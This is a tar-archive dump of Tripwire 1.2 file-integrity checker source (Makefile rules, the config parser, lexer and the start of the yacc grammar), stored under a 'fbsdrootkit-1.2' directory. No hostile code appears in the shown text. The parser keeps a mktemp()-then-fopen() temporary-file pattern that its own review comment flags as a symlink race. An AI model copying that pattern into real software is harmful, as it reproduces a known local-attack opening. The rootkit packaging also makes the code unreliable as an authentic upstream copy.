-I..") ../include/byteorder.h ../include/inode.h: (cd ../aux; make CC=$(CC) CFLAGS="$(CFLAGS)" \ LDFLAGS="$(LDFLAGS)" CPP="$(CPP)" SHELL=$(SHELL) all) help.c: help.txt help.sh $(SHELL) help.sh help.txt > help.c # need $(LDFLAGS) because this may interact with the way nullsig.o and # utils.o were compiled siggen: $(OSIGS) siggen.c utils.o nullsig.o $(CC) $(CFLAGS) $(LDFLAGS) -o siggen siggen.c $(OSIGS) nullsig.o utils.o $(LIBS) config.lex.c: config.pre.l $(LEX) config.pre.l mv lex.yy.c config.lex.c config.pre.c: config.lex.c config.pre.y $(YACC) config.pre.y sed 's/lex\.yy\.c/config.lex.c/' < y.tab.c > config.pre.c rm y.tab.c .c.o: $(CC) $(CFLAGS) -c $< install: tripwire $(INSTALL) tripwire $(DESTDIR) clean: -rm -f $(OFILES) config.lex.c config.pre.c y.tab.c lex.yy.c help.c \ siggen.o twconvert.o core .pure cscope.out for i in $(SIGDIRS); do \ (cd $$i; make clean;) \ done clobber: clean -rm -f tripwire siggen twconvert cscope.files: echo siggen.c $(CFILES) > cscope.files # Some other dependencies config.lex.o: config.lex.c config.parse.o: config.parse.c config.parse.o: ../include/config.h config.parse.o: ../include/list.h config.parse.o: ../include/tripwire.h config.parse.o: ../sigs/snefru/snefru.h config.parse.o: ../sigs/md5/md5.h config.parse.o: ../sigs/crc32/crc32.h config.parse.o: ../sigs/crc/crc.h config.parse.o: ../sigs/md2/md2.h config.parse.o: ../sigs/md4/md4.h config.parse.o: ../include/inode.h config.pre.o: config.pre.c config.pre.o: ../include/config.h config.pre.o: ../include/list.h config.pre.o: ../include/tripwire.h config.pre.o: ../sigs/snefru/snefru.h config.pre.o: ../sigs/md5/md5.h config.pre.o: ../sigs/crc32/crc32.h config.pre.o: ../sigs/crc/crc.h config.pre.o: ../sigs/md2/md2.h config.pre.o: ../sigs/md4/md4.h config.pre.o: ../include/inode.h config.pre.o: ./config.lex.c config.prim.o: config.prim.c config.prim.o: ../include/config.h config.prim.o: ../include/tripwire.h config.prim.o: ../sigs/snefru/snefru.h config.prim.o: ../sigs/md5/md5.h 
config.prim.o: ../sigs/crc32/crc32.h config.prim.o: ../sigs/crc/crc.h config.prim.o: ../sigs/md2/md2.h config.prim.o: ../sigs/md4/md4.h config.prim.o: ../include/inode.h config.prim.o: ../include/list.h dbase.build.o: dbase.build.c dbase.build.o: ../include/config.h dbase.build.o: ../include/list.h dbase.build.o: ../include/tripwire.h dbase.build.o: ../sigs/snefru/snefru.h dbase.build.o: ../sigs/md5/md5.h dbase.build.o: ../sigs/crc32/crc32.h dbase.build.o: ../sigs/crc/crc.h dbase.build.o: ../sigs/md2/md2.h dbase.build.o: ../sigs/md4/md4.h dbase.build.o: ../include/inode.h dbase.update.o: dbase.update.c dbase.update.o: ../include/config.h dbase.update.o: ../include/list.h dbase.update.o: ../include/tripwire.h dbase.update.o: ../sigs/snefru/snefru.h dbase.update.o: ../sigs/md5/md5.h dbase.update.o: ../sigs/crc32/crc32.h dbase.update.o: ../sigs/crc/crc.h dbase.update.o: ../sigs/md2/md2.h dbase.update.o: ../sigs/md4/md4.h dbase.update.o: ../include/inode.h ignorevec.o: ignorevec.c ignorevec.o: ../include/config.h ignorevec.o: ../include/list.h ignorevec.o: ../include/tripwire.h ignorevec.o: ../sigs/snefru/snefru.h ignorevec.o: ../sigs/md5/md5.h ignorevec.o: ../sigs/crc32/crc32.h ignorevec.o: ../sigs/crc/crc.h ignorevec.o: ../sigs/md2/md2.h ignorevec.o: ../sigs/md4/md4.h ignorevec.o: ../include/inode.h list.o: list.c list.o: ../include/config.h list.o: ../include/list.h main.o: main.c main.o: ../include/config.h main.o: ../include/list.h main.o: ../include/tripwire.h main.o: ../sigs/snefru/snefru.h main.o: ../sigs/md5/md5.h main.o: ../sigs/crc32/crc32.h main.o: ../sigs/crc/crc.h main.o: ../sigs/md2/md2.h main.o: ../sigs/md4/md4.h main.o: ../include/inode.h main.o: ../include/patchlevel.h nullsig.o: nullsig.c nullsig.o: ../include/config.h nullsig.o: ../include/tripwire.h nullsig.o: ../sigs/snefru/snefru.h nullsig.o: ../sigs/md5/md5.h nullsig.o: ../sigs/crc32/crc32.h nullsig.o: ../sigs/crc/crc.h nullsig.o: ../sigs/md2/md2.h nullsig.o: ../sigs/md4/md4.h nullsig.o: 
../include/inode.h nullsig.o: ../include/sigs.h preen.o: preen.c preen.o: ../include/config.h preen.o: ../include/list.h preen.o: ../include/tripwire.h preen.o: ../sigs/snefru/snefru.h preen.o: ../sigs/md5/md5.h preen.o: ../sigs/crc32/crc32.h preen.o: ../sigs/crc/crc.h preen.o: ../sigs/md2/md2.h preen.o: ../sigs/md4/md4.h preen.o: ../include/inode.h preen.interp.o: preen.interp.c preen.interp.o: ../include/config.h preen.interp.o: ../include/list.h preen.interp.o: ../include/tripwire.h preen.interp.o: ../sigs/snefru/snefru.h preen.interp.o: ../sigs/md5/md5.h preen.interp.o: ../sigs/crc32/crc32.h preen.interp.o: ../sigs/crc/crc.h preen.interp.o: ../sigs/md2/md2.h preen.interp.o: ../sigs/md4/md4.h preen.interp.o: ../include/inode.h preen.report.o: preen.report.c preen.report.o: ../include/config.h preen.report.o: ../include/list.h preen.report.o: ../include/tripwire.h preen.report.o: ../sigs/snefru/snefru.h preen.report.o: ../sigs/md5/md5.h preen.report.o: ../sigs/crc32/crc32.h preen.report.o: ../sigs/crc/crc.h preen.report.o: ../sigs/md2/md2.h preen.report.o: ../sigs/md4/md4.h preen.report.o: ../include/inode.h siggen.o: siggen.c siggen.o: ../include/config.h siggen.o: ../include/list.h siggen.o: ../include/tripwire.h siggen.o: ../sigs/snefru/snefru.h siggen.o: ../sigs/md5/md5.h siggen.o: ../sigs/crc32/crc32.h siggen.o: ../sigs/crc/crc.h siggen.o: ../sigs/md2/md2.h siggen.o: ../sigs/md4/md4.h siggen.o: ../include/inode.h utils.o: utils.c utils.o: ../include/config.h utils.o: ../include/list.h utils.o: ../include/tripwire.h utils.o: ../sigs/snefru/snefru.h utils.o: ../sigs/md5/md5.h utils.o: ../sigs/crc32/crc32.h utils.o: ../sigs/crc/crc.h utils.o: ../sigs/md2/md2.h utils.o: ../sigs/md4/md4.h utils.o: ../include/inode.h fbsdrootkit-1.2/tripwire-1.2/src/config.parse.c100600 764 764 40007 5613344536 16641 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: config.parse.c,v 1.21 1994/07/21 01:03:26 gkim Exp $"; #endif /* * config.parse.c * * read in the preen.config 
file * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #include #include #include #ifdef DIRENT # include #else # ifndef XENIX # include # else /* XENIX */ # include # endif /* XENIX */ #endif /* DIRENT */ #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include #ifdef STRINGH #include #else #include #endif #include "../include/list.h" #include "../include/tripwire.h" #if defined(SYSV) && (SYSV < 4) #ifndef HAVE_LSTAT # define lstat(x,y) stat(x,y) #endif #endif /* SYSV */ #if !defined(major) #define major(x) (((unsigned)(x)>>16)&0xffff) #endif #if !defined(minor) #define minor(x) ((x)&0xffff) #endif /* prototypes */ char *mktemp(); static void configfile_descend(); #ifndef L_tmpnam # define L_tmpnam (unsigned int) MAXPATHLEN #endif /* global */ /* we keep track of all the entry headers */ static struct list *prune_list = (struct list *) NULL; /* * configfile_read(struct list **pp_list, struct list **pp_entry_list) * * open the configuration file, and pulls out the {file/dir,ignore-flag} * pairs. * * (**pp_list) is pointer the head of the file list, where all the * files are added to. 
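*
*	(**pp_entry_list) receives one record per tw.config entry, keyed by
*	the entry name with the value "<entry number> <ignore vector>", plus
*	a reverse record keyed by the entry number (flag set to 1).
*
*	the preprocessed configuration is written to an unlinked temporary
*	file and scanned twice: pass 1 collects the '!' and '=' prune
*	entries, pass 2 builds the file list.  any parse or I/O error ends
*	the program.
*/

void
configfile_read(pp_list, pp_entry_list)
    struct list **pp_list;
    struct list **pp_entry_list;
{
    FILE *fpin, *fpout = (FILE *) NULL;
    /*
     * s holds one line of the preprocessed file.  filename and
     * ignorestring are deliberately as large as s, so that a "%s" token
     * scanned out of s can never be longer than its destination.
     */
    char s[MAXPATHLEN+1024];
    char filename[MAXPATHLEN+1024];
    char ignorestring[MAXPATHLEN+1024];
    char configfile[MAXPATHLEN+512];
    char *tmpfilename;
    char number[128];
    char *pc;
    int entrynum = 0;
    int err;

    /* to make code semi-reentrant */
    list_reset(&prune_list);

    /* don't print banner if we're in print-preprocessor mode */
    if (!printpreprocess && !quietmode)
        fputs("### Phase 1: Reading configuration file\n", stderr);

    /* generate temporary file name */
    if ((tmpfilename = (char *) malloc(L_tmpnam + MAXPATHLEN)) == NULL) {
        perror("configfile_read: malloc()");
        exit(1);
    }
    (void) strcpy(tmpfilename, TEMPFILE_TEMPLATE);

    /*
     * NOTE(review): mktemp() only chooses a name.  The fopen("w+") further
     * down will follow a symbolic link, or reuse a file, that appears under
     * that name between the two calls; umask(077) sets the mode of a file
     * we create ourselves but does not close that window.  Where the
     * platform provides it, mkstemp() (or open() with O_CREAT|O_EXCL)
     * creates and opens the file in one step.
     */
    if ((char *) mktemp(tmpfilename) == NULL) {
        perror("configfile_read: mktemp()");
        exit(1);
    }

    /* generate configuration file name, refusing names that do not fit */
    if (specified_configmode != SPECIFIED_FILE) {
        if (strlen(config_path) + strlen(config_file) + 2 >
                                                sizeof(configfile)) {
            fprintf(stderr,
                "tripwire: configuration file name is too long!\n");
            exit(1);
        }
        sprintf(configfile, "%s/%s", config_path, config_file);
    }
    else {
        if (strlen(specified_configfile) + 1 > sizeof(configfile)) {
            fprintf(stderr,
                "tripwire: configuration file name is too long!\n");
            exit(1);
        }
        (void) strcpy(configfile, specified_configfile);
    }

    /* open the files */
    /*          were we given a specific fd to use? */
    if (specified_configmode) {
        /* we already checked to see that it's a valid fd */
        if (!(fpin = (FILE *) fdopen(specified_configfd, "r"))) {
            perror("tripwire: Couldn't open fd! fdopen()");
            exit(1);
        }
        rewind(fpin);
        if ((err = ftell(fpin)) != 0) {
            die_with_err("configfile_read: ftell()", NULL);
        }
    }
    /*          otherwise, it's just a normal file */
    else if ((fpin = fopen(configfile, "r")) == NULL) {
        /* s is larger than configfile plus the fixed text, so this fits */
        sprintf(s, "tripwire: Couldn't open config file '%s'", configfile);
        perror(s);
        exit(1);
    }

    /* if we've already preprocessed the file, we can skip this */

    /* uh, we used to only parse the tw.config file once.
     * this causes problems during interactive updates.
     * so, with v1.2, we're a little slower, so sue me.
     * -ghk
     */

    err = umask(077);           /* to protect the tempfile */

    if ((fpout = fopen(tmpfilename, "w+")) == NULL) {
        /* report the file that actually failed, not the config file */
        perror("configfile_read: fopen() of temporary file");
        exit(1);
    }
    (void) umask(err);          /* return it to its former state */

    /* The following unlink accomplishes two things:
     *  1) if the program terminates, we won't leave a temp
     *     file sitting around with potentially sensitive names
     *     in it.
     *  2) the file is "hidden" while we run
     */
    if (unlink(tmpfilename) < 0) {
        perror("configfile_read: unlink()");
        exit(1);
    }
    free(tmpfilename);

    /*
     * pass 0: preprocess file
     *          call the yacc hook, located in y.tab.c
     */

    tw_macro_parse(configfile, fpin, fpout, (struct list **) pp_entry_list);

    /*
     * in fd mode the stream is left open: closing it would close the
     * descriptor that the rewind() above expects to find again.
     */
    if (!specified_configmode)
        (void) fclose(fpin);

    fflush(fpout);
    rewind(fpout);

    /* from here on we read the preprocessed copy */
    fpin = fpout;
    if ((err = ftell(fpin)) != 0) {
        die_with_err("configfile_read: ftell()", NULL);
    }

    /* do we just print out the file, and then exit? */
    if (printpreprocess) {
        int t;

        while ((t = getc(fpin)) != EOF)
            putc((char) t, stdout);
        exit(0);
    }

    /* pass 1: get all of the prune entries '!' */
    while (fgets(s, sizeof(s), fpin) != NULL) {
        int prune_mode;

        /* read in database entry */
        if ((err = sscanf(s, "%s %s", filename, ignorestring)) == 1) {
            (void) strcpy(ignorestring, defaultignore);
        }
        else if (err != 2) {
            fprintf(stderr,
                "configfile_read: parse error in the following line\n");
            fprintf(stderr, "\t>> %s", s);
            exit(1);
        }

        /* check for removeflag (preceding "!" or "=") */
        switch (*filename) {
        case '!':
            prune_mode = PRUNE_ALL;
            break;
        case '=':
            prune_mode = PRUNE_ONE;
            break;
        default:
            continue;                   /* nothing */
        }

        /*
         * adjust name: shift it left by one in place.  (strcpy() on
         * overlapping strings is undefined, so do it by hand.)
         */
        for (pc = filename; (pc[0] = pc[1]) != '\0'; pc++)
            ;

        /*
         * configfile_descend() formats the name into buffers sized from
         * MAXPATHLEN, so nothing longer may go any further.
         */
        if (strlen(filename) > MAXPATHLEN) {
            fprintf(stderr,
                "config: name longer than %d characters! Skipping...\n",
                (int) MAXPATHLEN);
            continue;
        }

        /* check for fully qualified pathname */
        if (*filename != '/') {
            fprintf(stderr,
                "config: %s is not fully qualified! Skipping...\n" ,
                filename);
            /* XXX -- error handling needed here */
            continue;
        }

        /* expand any escaped octal characters in name */
        filename_escape_expand(filename);

        /* add to local prune list */
        list_set(filename, "", 0, &prune_list);
SPDEBUG(1000) printf("configfile_read: pruning %s\n", filename);

        /* set appropriate prune flag */
        list_setflag(filename, prune_mode, &prune_list);
    }

    /* rewind the file for pass 2 */
    rewind(fpin);

    /* pass 2: build file lists */

    /* it's time for another banner */
    if (!printpreprocess && !quietmode)
        fputs("### Phase 2: Generating file list\n", stderr);

    while (fgets(s, sizeof(s), fpin) != NULL) {
        int howdeep;
        int prunedir = 0;

        /*
         * get {filename,ignore} pair:
         *      if only argument, then apply default ignore-flags
         *
         * note that {ignore} used in the tripwire.config file is
         *      different than the one stored in the database file!
         *
         * humans use the [N|R|L]+/-[pinugsmc3] format.  in the database,
         *      we use the old style where any capitalized letter
         *      means it's to be ignored.
         */

        /* make sure to remember that the ignorestring could be a comment! */
        err = sscanf(s, "%s %s", filename, ignorestring);
        if (err == 1 || (err == 2 && ignorestring[0] == '#')) {
            (void) strcpy(ignorestring, defaultignore);
        }
        else if (err != 2) {
            fprintf(stderr, "'%s'\nconfigfile_read: parse error\n", s);
            exit(1);
        }

        /* skip all prune entries (we've already taken care of it) */
        if (*filename == '!')
            continue;

        /* check for leading '=', prune after one recursion */
        else if (*filename == '=') {
            /* same in-place shift as in pass 1 */
            for (pc = filename; (pc[0] = pc[1]) != '\0'; pc++)
                ;
            prunedir++;
        }

        /* see pass 1: buffers further down are sized from MAXPATHLEN */
        if (strlen(filename) > MAXPATHLEN) {
            fprintf(stderr,
                "config: name longer than %d characters! Skipping...\n",
                (int) MAXPATHLEN);
            continue;
        }

        /* check for fully qualified pathname */
        if (*filename != '/') {
            fprintf(stderr,
                "config: %s is not fully qualified! Skipping...\n" ,
                filename);
            /* XXX -- error handling needed here */
            continue;
        }

        /* expand any escaped octal characters in name */
        filename_escape_expand(filename);

        /*
         * convert configuration-file style ignore-string to our database
         * representation.
         */
        ignore_configvec_to_dvec(ignorestring);

        /*
         * (number) must hold "<int> <ignorestring>": up to 11 characters
         * for the number, one blank and the terminator.  refuse anything
         * longer rather than truncate it, since a shortened ignore vector
         * would silently change what is checked.  the same bound keeps
         * the t[512] buffer in configfile_descend() safe.
         */
        if (strlen(ignorestring) > sizeof(number) - 13) {
            fprintf(stderr,
                "configfile_read: ignore-flags too long in the following line\n");
            fprintf(stderr, "\t>> %s", s);
            exit(1);
        }

        /* add it to the list while it still has escaped characters */
        sprintf(number, "%d %s", entrynum, ignorestring);
        list_set(filename, number, 0, pp_entry_list);
SPDEBUG(1000) printf("configfile_read: adding %s (%s)\n", filename, number);

        /* reverse index (number --> entryname) */
        {
            char eindex[50];

            sprintf(eindex, "%d", entrynum);
            list_set(eindex, filename, 0, pp_entry_list);
            list_setflag(eindex, 1, pp_entry_list);
        }

        /* pass down the priority -- based on how fully-qualified the
         *      entry was.
         */
        howdeep = slash_count(filename);

        /*
         * add the entry to list of entry headers (used for incremental
         * database updates.
         */
        configfile_descend(filename, ignorestring, howdeep, prunedir,
                                        pp_list, entrynum++);
    }                           /* end reading file */

    /* print out the list, if we're in a debuggin mode */
    if (debuglevel > 10)
        list_print(pp_list);

    /*
     * clean up: by now fpin and fpout are the same stream (the unlinked
     * temporary file), so it is closed exactly once and not touched again.
     */
    (void) fclose(fpout);

    return;
}

/*
 * configfile_descend(char *filename, char *ignorestring, int howdeep,
 *                      int prunedir, struct list **pp_list,
 *                      int entrynum)
 *
 *      recurses down the specified filename.  when it finally hits a real
 *      file, it is added to the list of files.
 *
 *      if (prunedir) is set, then we quit after one recursion.
 *
 *      this routine also resolves any multiple instances of a file by
 *      using (howdeep) as a precendence level.
 *
 *      (entrynum) is the unique entry number tag from tw.config.
 */

static void
configfile_descend (filename, ignorestring, howdeep, prunedir, pp_list,
                        entrynum)
    char *filename;
    char *ignorestring;
    int howdeep;
    int prunedir;
    struct list **pp_list;
    int entrynum;
{
    struct stat statbuf;
    static int countrecurse = 0;  /* count how many levels deep we are */
    static int majordev, minordev;
    char t[512];
    extern int errno;

    countrecurse++;

SPDEBUG(10)
    printf("---> %d: %s\n", countrecurse, filename);

    /* check to see if it's on the prune list */
    if (list_lookup(filename, &prune_list) != NULL) {
        int flag;

        /* return only if it was a '!'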
directive */ if ((flag = list_getflag(filename, &prune_list)) == PRUNE_ALL) { countrecurse--; return; } else if (flag == PRUNE_ONE) prunedir = 1; } /* get the stat structure of the (real) file */ if (lstat(filename, &statbuf) < 0) { char err[MAXPATHLEN+256]; int real_err = errno; /* in case sprintf clobbers the value */ if (debuglevel > 10) { sprintf(err, "configfile_descend: lstat(%s)", filename); } else { sprintf(err, "%s: %s", progname, filename); } errno = real_err; if (!quietmode) perror(err); /* so we just skip it */ countrecurse--; return; } /* * record our {major,minor} device pair if this is our first time * recursing. then we check if it changes. if it does, we've crossed * a filesystem, and we prune our tree. */ if (countrecurse == 1) { SPDEBUG(4) printf("configfile_descend: r=%d: %s\n", countrecurse, filename); majordev = major(statbuf.st_dev); minordev = minor(statbuf.st_dev); } else { #ifdef apollo /* * It seems that Apollos have (3904,0) for dirs, (3904,1) for files. * So how do we prevent ourselves from crossing filesystems * (descending into mounted disks)? */ if ((major(statbuf.st_dev) != majordev || minor(statbuf.st_dev) != minordev) && ! ( majordev == 3904 && minordev == 0 && major(statbuf.st_dev) == 3904 && minor(statbuf.st_dev) == 1 ) && ! ( majordev == 3904 && minordev == 1 && major(statbuf.st_dev) == 3904 && minor(statbuf.st_dev) == 0 )) #else if (major(statbuf.st_dev) != majordev || minor(statbuf.st_dev) != minordev) #endif { SPDEBUG(4) printf("configfile_descend: pruning '%s' n(%d,%d) != o(%d, %d)\n", filename, major(statbuf.st_dev), minor(statbuf.st_dev), majordev, minordev); countrecurse--; return; /* prune */ } } /* * if it is a directory file, then we read in the directory entries * and then recurse into the directory. * * remember, check to see if it's a symbolic link. we never traverse * them. 
*/ if (((statbuf.st_mode & S_IFMT) == S_IFDIR) #if !defined(SYSV) || (SYSV > 3) && !((statbuf.st_mode & S_IFMT) == S_IFLNK)) #else ) #endif { DIR *p_dir; #ifdef DIRENT struct dirent *pd; #else struct direct *pd; #endif char recursefile[MAXPATHLEN+256]; /* handle prunedir flag */ /* * concatenate entry number to the ignore-string */ sprintf(t, "%d %s", entrynum, ignorestring); /* * just nix it from the list? */ /* XXX if (strcmp(filename, "/tmp") == 0) ; if (strcmp(filename, "/tmp") == 0) list_print(pp_list); */ /* * Remember: we have escaped filenames (i.e. filenames with * funny characters replaced with \123 sequences) in cf and db * files, and maybe in some report messages (to avoid messing * up silly terminals that cannot cope with those characters; * why do people then have such files?), but internally we save * them in all their gory detail. Otherwise it would be too * hard to keep track of where to convert a name, or if it has * been converted already; in particular we screwed up on * saving the same way for list_set and list_set_flag. */ /*zzzzz Was: remember, we save filenames with escape sequences in the lists zzzzz*/ list_set(filename, t, howdeep, pp_list); SPDEBUG(1000) printf("configfile_descend: adding %s\n", filename); (void) list_setflag(filename, FLAG_NOOPEN, pp_list); /* if it's a symbolic link, make sure we flag it as such! */ #if !defined(SYSV) || (SYSV > 3) if ((statbuf.st_mode & S_IFMT) == S_IFLNK) { (void) list_setflag(filename, FLAG_SYMLINK, pp_list); } #endif if (prunedir) { countrecurse--; return; } SPDEBUG(4) fprintf(stderr, "configfile_descend: %s: it's a directory!\n", filename); if ((p_dir = opendir(filename)) == NULL) { if (debuglevel > 10) { perror("configfile_descend: opendir()"); } else { char err[MAXPATHLEN+256]; int real_errno = errno; sprintf(err, "%s: %s", progname, filename); errno = real_errno; if (!quietmode) perror(err); } countrecurse--; return; } /* broken xenix compiler returns "illegal continue" ?!? 
*/ #ifdef XENIX #define XCONTINUE goto XENIX_CONT #else #define XCONTINUE continue #endif for (pd = readdir(p_dir); pd != NULL; pd = readdir(p_dir)) { /* we could use strcmp in the following, but this is much faster */ if (pd->d_name[0] == '.') { if (pd->d_name[1] == 0) /* must be . */ XCONTINUE; else if (pd->d_name[1] == '.') { if (pd->d_name[2] == 0) /* must be .. */ XCONTINUE; } } SPDEBUG(4) printf("--> descend: %s\n", pd->d_name); /* build pathname of file */ /* Assume all filenames ar root anchored. If so, and filename[1] is null, then filename must be '/'. Thus we don't need to concatenate a slash into the recursefile. */ if (filename[1] == '\0') { sprintf(recursefile, "%s%s", filename, pd->d_name); } else { sprintf(recursefile, "%s/%s", filename, pd->d_name); } /* recurse. it'll pop right back if it is just a file */ configfile_descend(recursefile, ignorestring, howdeep, 0, pp_list, entrynum); XENIX_CONT: ; } /* end foreach file */ /* cleanup */ closedir(p_dir); } /* end if dir */ else { /* * concatenate entry number to the ignore-string */ sprintf(t, "%d %s", entrynum, ignorestring); /* add to list */ list_set(filename, t, howdeep, pp_list); /* * if it is a special file or device, add it to the list, but * make sure we don't open it and read from it! */ switch (statbuf.st_mode & S_IFMT) { case S_IFIFO: case S_IFCHR: case S_IFBLK: #if !defined(SYSV) || (SYSV > 3) #ifndef apollo /* Foolish Apollos define S_IFSOCK same as S_IFIFO in /bsd4.3/usr/include/sys/stat.h */ case S_IFSOCK: #endif #endif (void) list_setflag(filename, FLAG_NOOPEN, pp_list); break; #if !defined(SYSV) || (SYSV > 3) case S_IFLNK: /* if it's a symbolic link, make sure we flag it as such! 
*/ (void) list_setflag(filename, FLAG_SYMLINK, pp_list); break; #endif default: break; /* do nothing for regular files */ } } /* end else dir */ countrecurse--; return; } fbsdrootkit-1.2/tripwire-1.2/src/config.pre.l100600 764 764 6241 5614756407 16315 0ustar dfdf%{ /* $Id: config.pre.l,v 1.13 1994/07/25 15:40:55 gkim Exp $ */ /* * config.pre.l * * lexical analyzer for preprocessing tw.config files. * * note that escaped sequences in the token must be * expanded manually. * * Gene Kim * Purdue University * October 4, 1992 */ /* * note that strings can contain '@'s, but they * cannot start with them! * * similarly, we can have #'s in strings, but they * cannot be the first character! */ %} WS [ \t] COMMENT [#] EOL [\n] DIRECTIVE @{2,2} STRING ([^ \t\n\#\(\)]|\\.)+([^ \t\n\(\)]|\\.)* LPAREN [\(] RPAREN [\)] ANDAND \&{2,2} OROR \|{2,2} BSLASH [\\] %% {WS}+ { /* eat spaces */ } {BSLASH}{EOL} { /* eat line continuations */ linenumber++; } {COMMENT}[^\n]* { /* eat comments */ } ^{DIRECTIVE}{WS}*include { return INCLUDE; } ^{DIRECTIVE}{WS}*define { return DEFINE; } ^{DIRECTIVE}{WS}*undef { return UNDEF; } ^{DIRECTIVE}{WS}*ifdef { return IFDEF; } ^{DIRECTIVE}{WS}*ifndef { return IFNDEF; } ^{DIRECTIVE}{WS}*ifhost { return IFHOST; } ^{DIRECTIVE}{WS}*ifnhost { return IFNHOST; } ^{DIRECTIVE}{WS}*contents { return CONTENTS; } ^{DIRECTIVE}{WS}*dbaseversion { return DBASEVERSION; } ^{DIRECTIVE}{WS}*else { return ELSE; } ^{DIRECTIVE}{WS}*endif { return ENDIF; } ^{DIRECTIVE}{WS}*echo { return ECHOTHIS; } {EOL} { linenumber++; return EOL; } {ANDAND} { return ANDAND; } {OROR} { return OROR; } {LPAREN} { return LPAREN; } {RPAREN} { return RPAREN; } {STRING} { char *pcin, *pcout, macro[1024], *pcm; static char outstring[1024]; char *pctmp; yytext[yyleng] = '\0'; yylval.string = yytext; SPDEBUG(20) { printf("---(prestring)---> %s\n", yytext); } pcin = yytext; pcout = outstring; for (; *pcin; pcin++) { /* check for macro expansion */ if (*pcin == '@' && *(pcin+1) && *(pcin+1) == '@') { 
int curlymode = 0; /* bounded by '{' and '}' */ pcm = macro; pcin += 2; while (*pcin && (isalnum(*pcin) || *pcin == '_' || *pcin == '{' || *pcin == '}')) { if (*pcin == '{') { /* nested curlies are not allowed! */ if (curlymode) { fprintf(stderr, "warning: line %d: nested `{}' expressions are not allowed!\n", linenumber); } else { curlymode = 1; } pcin++; continue; } if (curlymode && *pcin == '}') { pcin++; curlymode = 0; break; } *pcm++ = *pcin++; } *pcm++ = '\0'; SPDEBUG(20) { printf("--(macro)--> %s\n", macro); } /* expand macro */ if (tw_mac_ifdef(macro) == 0) { fprintf(stderr, "warning: uninitialized directive '%s' at line %d in config file\n\t'%s' !\n\t\t(Hint: maybe a misspelled directive?)\n", macro, linenumber, currparsefile); } else { /* else substitute in the input stream */ pctmp = tw_mac_dereference(macro); assert(pctmp != NULL); SPDEBUG(20) { printf("--(dmacro)--> %s\n", pctmp); } strcpy(pcout, pctmp); pcout += strlen(pctmp); } pcin--; /* rewind for loop */ continue; } *pcout++ = *pcin; } *pcout++ = '\0'; yylval.string = outstring; if (yaccdebuglevel > 10) printf("--(STRING)--> %s\n", outstring); return STRING; } fbsdrootkit-1.2/tripwire-1.2/src/config.pre.y100600 764 764 26334 5620062040 16333 0ustar dfdf%token COMMENT %token EOL %token STRING %token INCLUDE %token DEFINE %token UNDEF %token ELSE %token ENDIF %token CONTENTS %token DBASEVERSION %token LPAREN %token RPAREN %token ANDAND %token OROR %token ECHOTHIS %token BSLASH %token ESCCHAR %{ /* $Id: config.pre.y,v 1.23 1994/08/04 03:44:32 gkim Exp $ */ /* * config.y * * tw.config preprocessor parser for yacc. * * This implementation does an unfortunately large number of * malloc()'s and free()'s to store the lexeme values. Although * memory leaks are few, too much time is spent doing memory * allocation. * * At this point, I would argue that this is not too significant, * since we only run this routine once. 
* * Gene Kim * Purdue University * October 5, 1992 * * Modified by Cal Page to work with linux, March 9, 1994 */ #include "../include/config.h" #include #ifdef STDLIBH #include #endif #ifdef STRINGH #include #else #include #endif #ifdef MALLOCH #include #endif #include #include #include #include #include #include "../include/list.h" #include "../include/tripwire.h" extern FILE *yyin; extern FILE *yyout; #ifdef TW_LINUX #include void *yy_flex_realloc(void *x,int y) { return realloc(x,y); } void *yy_flex_alloc (int y ) { return malloc(y); } void yy_flex_free (void *x ) { free(x); } #define yy_strcpy(a,b) strcpy((a),(b)) #endif /* TW_LINUX */ #define INCLUDE_STACK_SZ 16 /* max num of nested includes */ int yaccdebuglevel = 0; static int linenumber = 1; static FILE *fp_stack[INCLUDE_STACK_SZ]; static int linenumber_stack[INCLUDE_STACK_SZ]; static char *filename_stack[INCLUDE_STACK_SZ]; static int stackpointer = 0; static int found_db_version = 0; static struct list **pp_entry_list_global = NULL; static char currparsefile[MAXPATHLEN+1024]; /* prototypes */ static char *string_dequote(); static void include_push(); static FILE *include_pop(); /* this is for some versions of flex and bison, who don't make any * effort to look like lex and yacc. 
*/ #ifdef LINUX extern FILE **yyin, *yyout; void *yy_flex_realloc(void *x,int y) { return realloc(x,y); } void *yy_flex_alloc (int y ) { return malloc(y); } void yy_flex_free (void *x ) { free(x); } #endif struct comp { char *string; int directive; }; %} %union { struct comp *comp; char *string; long val; } %left COMMENT ESCCHAR STRING %token IFDEF IFNDEF IFHOST IFNHOST /* %type word words directive colines coline else */ %type word %type words directive colines coline else %type if_expr host_expr %left ANDAND OROR %start lines %% lines : lines line | ; /* we do all of the line-emitting in this production (line) */ line : directive EOL { /* linenumber++; */ if ($1) { fprintf(yyout, "%s\n", $1); free($1); } } | words EOL { /* linenumber++; */ if ($1) { fprintf(yyout, "%s\n", $1); free($1); } } ; colines : colines coline { /* If coline is null, just pass on colines. */ if ($2 == NULL) { $$ = $1; } else { /* concatenate the two terminals together */ if ($1 == NULL) { $$ = (char *) malloc((unsigned) strlen($2) + 1); $$[0] = '\0'; } else { $$ = (char *) malloc((unsigned) (strlen($1) + strlen($2)) + 2); (void) strcpy($$, $1); (void) strcat($$, "\n"); /* free up the left component */ free($1); } (void) strcat($$, $2); /* free up the right component */ if ($2) free($2); } SPDEBUG(11) printf("--(coline)--> (%s)\n", $$); } | { $$ = NULL; } ; coline : directive EOL { $$ = $1; /* linenumber++; */} | words EOL { $$ = $1; /* linenumber++; */} ; else : ELSE colines { $$ = $2; } | { $$ = NULL; } ; if_expr : LPAREN if_expr RPAREN { $$ = $2; } | if_expr ANDAND if_expr { $$ = $1 && $3; } | if_expr OROR if_expr { $$ = $1 || $3; } | word { check_varname($1->string); $$ = tw_mac_ifdef($1->string); } host_expr: LPAREN host_expr RPAREN { $$ = $2; } | host_expr ANDAND host_expr { $$ = $1 && $3; } | host_expr OROR host_expr { $$ = $1 || $3; } | word { $$ = tw_mac_ifhost($1->string); } directive: DEFINE word { check_varname($2->string); tw_mac_define($2->string, ""); $$ = NULL; } | DEFINE 
